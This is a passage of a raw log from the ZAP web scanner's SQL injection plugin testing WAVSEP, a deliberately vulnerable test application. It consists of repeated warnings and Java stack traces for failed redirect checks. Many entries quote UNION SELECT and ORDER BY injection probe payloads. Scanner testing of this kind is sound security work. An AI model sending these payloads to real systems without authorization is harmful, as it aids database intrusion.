org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680984 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680985 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 6074#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 6074# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680986 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680987 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680988 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680989 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680990 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680992 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680992 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680993 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680994 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680995 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680995 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at 